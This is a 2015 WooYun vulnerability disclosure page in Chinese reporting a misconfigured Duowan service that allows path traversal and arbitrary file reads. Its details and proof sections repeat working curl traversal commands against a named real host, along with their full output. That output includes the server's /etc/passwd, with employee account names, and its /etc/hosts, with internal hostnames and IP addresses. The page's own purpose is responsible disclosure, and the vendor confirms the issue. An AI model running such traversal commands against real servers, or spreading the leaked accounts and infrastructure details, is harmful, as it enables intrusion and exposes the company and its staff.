多玩某服务配置不当导致任意系统文件读取

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092097

漏洞标题：多玩某服务配置不当导致任意系统文件读取

漏洞作者： boooooom

提交时间：2015-01-15 19:39

修复时间：2015-03-01 19:40

公开时间：2015-03-01 19:40

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-15：细节已通知厂商并且等待厂商处理中
2015-01-16：厂商已经确认，细节仅向厂商公开
2015-01-26：细节向核心白帽子及相关领域专家公开
2015-02-05：细节向普通白帽子公开
2015-02-15：细节向实习白帽子公开
2015-03-01：细节向公众公开

简要描述：

详细说明：

[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:103:106::/var/lib/snmp:/bin/false
yuwanfu:x:1001:1003::/home/yuwanfu:/bin/bash
wuhaiting:x:1012:1014::/home/wuhaiting:/bin/bash
user_00:x:1019:1021::/home/user_00:/bin/bash
dspeak:x:1020:1022::/home/dspeak:/usr/sbin/nologin
xiaoshengwen:x:2592:2592::/home/xiaoshengwen:/bin/bash
sunjianpeng:x:2605:2605::/home/sunjianpeng:/bin/bash
liumeijun:x:2659:2659::/home/liumeijun:/bin/bash
lijie1:x:2744:2744::/home/lijie1:/bin/bash
liangguanhui:x:2063:2063::/home/liangguanhui:/bin/bash
liuyixing:x:2832:2832::/home/liuyixing:/bin/bash
zenglei:x:2723:2723::/home/zenglei:/bin/bash
zhoumingliang:x:2735:2735::/home/zhoumingliang:/bin/bash
linxiaohu:x:2083:2083::/home/linxiaohu:/bin/bash
liushoukai:x:2902:2902::/home/liushoukai:/bin/bash
[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/hosts
127.0.0.1   localhost
127.0.1.1   ubuntu
106.38.198.9 manager.repos.yy.duowan.com
121.14.37.147  balance.yy.duowan.com
220.181.86.207  sdaemon.yy.duowan.com
121.14.37.153 sdaemon2.yy.duowan.com
121.14.37.153 rdaemon.yy.duowan.com
220.181.86.207 rdaemon2.yy.duowan.com
119.147.160.90 yycookie.yy.duowan.com
58.215.46.21   mirror.yy.duowan.com
121.14.37.153   config.yy.duowan.com
121.14.43.142	oams.yy.duowan.com
221.228.79.31	bc.yy.duowan.com
221.228.79.32	bc2.yy.duowan.com
106.38.255.130	oams2.yy.duowan.com

漏洞证明：

[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:103:106::/var/lib/snmp:/bin/false
yuwanfu:x:1001:1003::/home/yuwanfu:/bin/bash
wuhaiting:x:1012:1014::/home/wuhaiting:/bin/bash
user_00:x:1019:1021::/home/user_00:/bin/bash
dspeak:x:1020:1022::/home/dspeak:/usr/sbin/nologin
xiaoshengwen:x:2592:2592::/home/xiaoshengwen:/bin/bash
sunjianpeng:x:2605:2605::/home/sunjianpeng:/bin/bash
liumeijun:x:2659:2659::/home/liumeijun:/bin/bash
lijie1:x:2744:2744::/home/lijie1:/bin/bash
liangguanhui:x:2063:2063::/home/liangguanhui:/bin/bash
liuyixing:x:2832:2832::/home/liuyixing:/bin/bash
zenglei:x:2723:2723::/home/zenglei:/bin/bash
zhoumingliang:x:2735:2735::/home/zhoumingliang:/bin/bash
linxiaohu:x:2083:2083::/home/linxiaohu:/bin/bash
liushoukai:x:2902:2902::/home/liushoukai:/bin/bash
[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/hosts
127.0.0.1   localhost
127.0.1.1   ubuntu
106.38.198.9 manager.repos.yy.duowan.com
121.14.37.147  balance.yy.duowan.com
220.181.86.207  sdaemon.yy.duowan.com
121.14.37.153 sdaemon2.yy.duowan.com
121.14.37.153 rdaemon.yy.duowan.com
220.181.86.207 rdaemon2.yy.duowan.com
119.147.160.90 yycookie.yy.duowan.com
58.215.46.21   mirror.yy.duowan.com
121.14.37.153   config.yy.duowan.com
121.14.43.142	oams.yy.duowan.com
221.228.79.31	bc.yy.duowan.com
221.228.79.32	bc2.yy.duowan.com
106.38.255.130	oams2.yy.duowan.com

修复方案：

修改配置

版权声明：转载请注明来源 boooooom@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-01-16 15:02

厂商回复：

非常感谢对于欢聚时代安全工作的支持，我们会尽快修复!

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092097

漏洞标题：多玩某服务配置不当导致任意系统文件读取

相关厂商：广州多玩

漏洞作者： boooooom

提交时间：2015-01-15 19:39

修复时间：2015-03-01 19:40

公开时间：2015-03-01 19:40

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 boooooom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092097

漏洞标题：多玩某服务配置不当导致任意系统文件读取

相关厂商：广州多玩

漏洞作者： boooooom

提交时间：2015-01-15 19:39

修复时间：2015-03-01 19:40

公开时间：2015-03-01 19:40

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-092097"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 boooooom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：